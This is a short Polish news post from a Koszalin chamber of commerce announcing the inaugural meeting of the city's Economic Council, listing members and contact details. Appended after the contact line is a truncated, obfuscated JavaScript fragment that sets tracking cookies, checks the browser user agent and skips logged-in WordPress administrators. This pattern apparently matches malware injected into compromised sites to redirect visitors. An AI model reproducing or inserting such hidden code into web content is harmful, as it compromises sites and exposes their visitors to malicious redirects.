Inauguracyjne posiedzenie Rady Gospodarczej | Północna Izba Gospodarcza w Koszalinie

W dniu 19 czerwca powołana została po raz piąty Rada Gospodarcza przy Prezydencie Miasta Koszalina. W skład której wchodzą między innymi członkowie Północnej izby Gospodarczej: Pani Dorota Sikora z Banku PKO BP, Pani Helena Moroz i Sylwester Szymanik z Espersen Koszalin Sp. z o.o, Pani Wanda Stypułkowska z MPS International Sp. z o. o. oraz Pan Roman Biłas z Ad.Media Consulting i prezes Północnej Izby Gospodarczej w Koszalinie.

Rada Gospodarcza jest organem doradczym i opiniującym przy Prezydencie Miasta Koszalina. Zajmuję się przede wszystkim sprawami przedsiębiorczości w Koszalinie i wszelkimi rozwiązaniami związanymi z gospodarką Miasta. Dlatego serdecznie zachęcamy, aby za pośrednictwem naszego Biura zgłaszać propozycje i projektów które miałyby być podjęte na Radzie, przedstawione Panu Prezydentowi i Radzie miejskiej.

Zapraszamy do kontaktu mailowego na koszalin@izba.info lub telefonicznie pod numer 537 184 630. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m